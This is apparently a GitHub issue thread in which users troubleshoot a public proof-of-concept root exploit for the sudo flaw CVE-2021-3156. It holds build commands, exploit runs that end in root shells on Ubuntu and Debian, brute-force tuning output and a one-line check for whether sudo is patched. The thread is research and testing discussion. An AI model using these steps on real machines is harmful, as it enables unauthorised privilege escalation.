blasty
commented
3 years ago Can you try adding a test user to your system and run the exploit from that? I've seen issues where a user who's already privileged to use sudo make the exploit fail.
Open LyesH4ck opened 3 years ago
blasty
commented
3 years ago Can you try adding a test user to your system and run the exploit from that? I've seen issues where a user who's already privileged to use sudo make the exploit fail.
transparentdata243
commented
3 years ago same issue here. environment is same as above. Used a test user which is not in sudoers list.
LyesH4ck
commented
3 years ago Can you try adding a
testuser to your system and run the exploit from that? I've seen issues where a user who's already privileged to use sudo make the exploit fail.
test@ubuntu20:~/CVE-2021-3156$ ./sudo-hax-me-a-sandwich 0
** CVE-2021-3156 PoC by blasty peter@haxx.in
using target: 'Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31' pray for your rootshell.. [+] bl1ng bl1ng! We got it!
Ok it works ;)
When I use your fuzz2.py.. I can't find a good crash in nss_load_library() or in process_hook_getenv(). Is that normal ? Maybe something I don't understand. I found crash in set_cmnd()... Only interesting way I found ..
Any hint ?
Thanks you !
blasty
commented
3 years ago @Lyes06 Good to see you could get it working with a different user! fuzz2.py must be run as a user who has sudo rights (if you look in the script you can see it invokes sudo env -i ...). You have to be lucky to get some "nice" crashes with this fuzzer. I might rewrite that thing eventually, it can be made better(tm).
PixiesPixel
commented
3 years ago It also doesn't work on my ubuntu 20.04
`$ ./sudo-hax-me-a-sandwich
** CVE-2021-3156 PoC by blasty peter@haxx.in
usage: ./sudo-hax-me-a-sandwich
0) Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31
1) Debian 10.0 (Buster) - sudo 1.8.27, libc-2.28$ ./sudo-hax-me-a-sandwich 0
** CVE-2021-3156 PoC by blasty peter@haxx.in
using target: 'Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31' pray for your rootshell.. usage: sudoedit [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-T timeout] [-u user] file ... $ id -a uid=1001(test) gid=1001(test) groups=1001(test) $ lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 20.04.1 LTS Release: 20.04 Codename: focal `
LyesH4ck
commented
3 years ago It also doesn't work on my ubuntu 20.04
`$ ./sudo-hax-me-a-sandwich
** CVE-2021-3156 PoC by blasty peter@haxx.in
usage: ./sudo-hax-me-a-sandwich
available targets:
0) Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31 1) Debian 10.0 (Buster) - sudo 1.8.27, libc-2.28$ ./sudo-hax-me-a-sandwich 0
** CVE-2021-3156 PoC by blasty peter@haxx.in
using target: 'Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31' pray for your rootshell.. usage: sudoedit [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-T timeout] [-u user] file ... $ id -a uid=1001(test) gid=1001(test) groups=1001(test) $ lsb_release -a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu 20.04.1 LTS Release: 20.04 Codename: focal `
You get the Usage .. So I think your ubuntu is patched..
Try this : sudoedit -s '\' perl -e 'print "A" x 65536'
If you get usage information... so you are patched.
PixiesPixel
commented
3 years ago I haven't patch it soon, but you may right.
sudoedit -s '' perl -e 'print "A" x 65536' usage: sudoedit [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-T timeout] [-u user] file ..
LyesH4ck
commented
3 years ago I haven't patch it soon, but you may right.
sudoedit -s '' perl -e 'print "A" x 65536' usage: sudoedit [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-T timeout] [-u user] file ..
I confirm, you are patched :) Try to reinstall old sudo packages if you want to play with it ;)
LyesH4ck
commented
3 years ago I deleted my last post to explain again the problem.
- Compilation with Make - No -DBRUTE option
$ make rm -rf libnss_X mkdir libnss_X gcc -std=c99 -o sudo-hax-me-a-sandwich hax.c gcc -fPIC -shared -o 'libnss_X/P0PSH3LLZ .so.2' lib.c
$ ./sudo-hax-me-a-sandwich 0
** CVE-2021-3156 PoC by blasty peter@haxx.in
using target: Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27 ['/usr/bin/sudoedit'] (56, 54, 63, 212) pray for your rootshell.. [+] bl1ng bl1ng! We got it! '#'
- When I use the options used in brute.sh
$ make brute rm -rf libnss_X mkdir libnss_X gcc -std=c99 -o sudo-hax-me-a-sandwich hax.c gcc -fPIC -shared -o 'libnss_X/P0PSH3LLZ .so.2' lib.c gcc -DBRUTE -fPIC -shared -o 'libnss_X/P0PSH3LLZ .so.2' lib.c
$ ./sudo-hax-me-a-sandwich 0
** CVE-2021-3156 PoC by blasty peter@haxx.in
using target: Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27 ['/usr/bin/sudoedit'] (56, 54, 63, 212) pray for your rootshell.. [+] bl1ng bl1ng! We got it! [sudo] password for test:
And when we are using just the printf() in lib.c, brute.sh freez and it stoped But I don't know why ...
LyesH4ck
commented
3 years ago - When the sploit works
using target: Ubuntu 18.04.5 (Bionic Beaver) - sudo 1.8.21, libc-2.27 ['/usr/bin/sudoedit'] (56, 54, 63, 212)
pray for your rootshell..
[+] bl1ng bl1ng! We got it!
#
$ ./brute.sh 50 60 50 70 200 220 [+] cleaning up.. rm -rf libnss_X mkdir libnss_X gcc -std=c99 -o sudo-hax-me-a-sandwich hax.c gcc -fPIC -shared -o 'libnss_X/P0PSH3LLZ .so.2' lib.c gcc -DBRUTE -fPIC -shared -o 'libnss_X/P0PSH3LLZ .so.2' lib.c [+] generating possibilities.. [+] lets go..
Computers / CPU cores / Max jobs to run 1:local / 2 / 4
Computer:jobs running/jobs completed/%of started jobs/Average seconds to complete ETA: 0s Left: 693 AVG: 0.00s local:4/0/100%/0.0s NOPE ./brute.sh: line 13: 292375 Aborted ( timeout 2 stdbuf -oL ./sudo-hax-me-a-sandwich $ALEN $BLEN $NLEN $LCLEN 2>&1 ) > $OFN ETA: 0s Left: 692 AVG: 0.00s local:4/1/100%/1.0s NOPE ./brute.sh: line 13: 292361 Aborted ( timeout 2 stdbuf -oL ./sudo-hax-me-a-sandwich $ALEN $BLEN $NLEN $LCLEN 2>&1 ) > $OFN ETA: 0s Left: 691 AVG: 0.00s local:4/2/100%/0.5s NOPE ./brute.sh: line 13: 292368 Aborted ( timeout 2 stdbuf -oL ./sudo-hax-me-a-sandwich $ALEN $BLEN $NLEN $LCLEN 2>&1 ) > $OFN ETA: 0s Left: 690 AVG: 0.00s local:4/3/100%/0.3s NOPE ./brute.sh: line 13: 292369 Aborted ( timeout 2 stdbuf -oL ./sudo-hax-me-a-sandwich $ALEN $BLEN $NLEN $LCLEN 2>&1 ) > $OFN ETA: 0s Left: 689 AVG: 0.00s local:4/4/100%/0.2s NOPE ....... ....... ETA: 0s Left: 4 AVG: 0.12s local:4/689/100%/0.1s NOPE ./brute.sh: line 13: 309687 Aborted ( timeout 2 stdbuf -oL ./sudo-hax-me-a-sandwich $ALEN $BLEN $NLEN $LCLEN 2>&1 ) > $OFN ETA: 0s Left: 3 AVG: 0.12s local:3/690/100%/0.1s NOPE ./brute.sh: line 13: 309721 Aborted ( timeout 2 stdbuf -oL ./sudo-hax-me-a-sandwich $ALEN $BLEN $NLEN $LCLEN 2>&1 ) > $OFN ETA: 0s Left: 2 AVG: 0.12s local:2/691/100%/0.1s NOPE ./brute.sh: line 13: 309737 Aborted ( timeout 2 stdbuf -oL ./sudo-hax-me-a-sandwich $ALEN $BLEN $NLEN $LCLEN 2>&1 ) > $OFN ETA: 0s Left: 1 AVG: 0.12s local:1/692/100%/0.1s NOPE ./brute.sh: line 13: 309762 Aborted ( timeout 2 stdbuf -oL ./sudo-hax-me-a-sandwich $ALEN $BLEN $NLEN $LCLEN 2>&1 ) > $OFN ETA: 0s Left: 0 AVG: 0.12s local:0/693/100%/0.1s [+] done [-] we didnt find any working candidates :(
LyesH4ck
commented
3 years ago I modified your script brute.sh and delete /2 used in the script. Now it works.. but I freez .. (ETA : 7287s). I need to C^ to finish the execution .. I don't know why the script is freezing ...
CVE-2021-3156 PoC by blasty peter@haxx.in
CVE-2021-3156 PoC by blasty peter@haxx.in
CVE-2021-3156 PoC by blasty peter@haxx.in
CVE-2021-3156 PoC by blasty peter@haxx.in
CVE-2021-3156 PoC by blasty peter@haxx.in
CVE-2021-3156 PoC by blasty peter@haxx.in
using target: Manual ['/usr/bin/sudoedit'] (52, 53, 68, 220) pray for your rootshell.. [+] bl1ng bl1ng! We got it!
sha0coder
commented
3 years ago Same vagrant ubuntu/focal64 same libc + sudo version (manually compiled) and don't work, even don't seem exploitable: The "@CCCCC" buffers are far from the "systemd" and other service_user structures (0x1000 the more near) . The user_args malloc fit well in the previous free but it's still very far. I have friends that it happens the same situation. Using no sudoers users also don't work for me. probably the exploitation depends on other factors: ram? locales? etc. Blasty, make it sense?
jm33-m0
commented
3 years ago Same vagrant ubuntu/focal64 same libc + sudo version (manually compiled) and don't work, even don't seem exploitable: The "@ccccc" buffers are far from the "systemd" and other service_user structures (0x1000 the more near) . The user_args malloc fit well in the previous free but it's still very far. I have friends that it happens the same situation. Using no sudoers users also don't work for me. probably the exploitation depends on other factors: ram? locales? etc. Blasty, make it sense?
Same here, no luck with manually compiled sudo
Hello,
Tested on my fresh install of focal.
user@ubuntu20:~/TEST/CVE-2021-3156$ ldd --version ldd (Ubuntu GLIBC 2.31-0ubuntu9) 2.31 Copyright (C) 2020 Free Software Foundation, Inc. This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. Written by Roland McGrath and Ulrich Drepper.
user@ubuntu20:~/TEST/CVE-2021-3156$ uname -a Linux ubuntu20 5.8.0-41-generic #46~20.04.1-Ubuntu SMP Mon Jan 18 17:52:23 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
user@ubuntu20:~/TEST/CVE-2021-3156$ ls hax.c lib.c libnss_X Makefile README.md sudo-hax-me-a-sandwich user@ubuntu20:~/TEST/CVE-2021-3156$ ./sudo-hax-me-a-sandwich 0
** CVE-2021-3156 PoC by blasty peter@haxx.in
using target: 'Ubuntu 20.04.1 (Focal Fossa) - sudo 1.8.31, libc-2.31' pray for your rootshell.. free(): invalid pointer Aborted (core dumped)
user@ubuntu20:~/TEST/CVE-2021-3156$ cat /etc/issue Ubuntu 20.04.1 LTS \n \l
user@ubuntu20:~/TEST/CVE-2021-3156$ /usr/bin/sudo --version Sudo version 1.8.31 Sudoers policy plugin version 1.8.31 Sudoers file grammar version 46 Sudoers I/O plugin version 1.8.31
I've tested your fuzz2.py but I'not able to crash in process_hooks_getenv() or in nss_load_library()... Only found Interesting crash in set_cmnd()...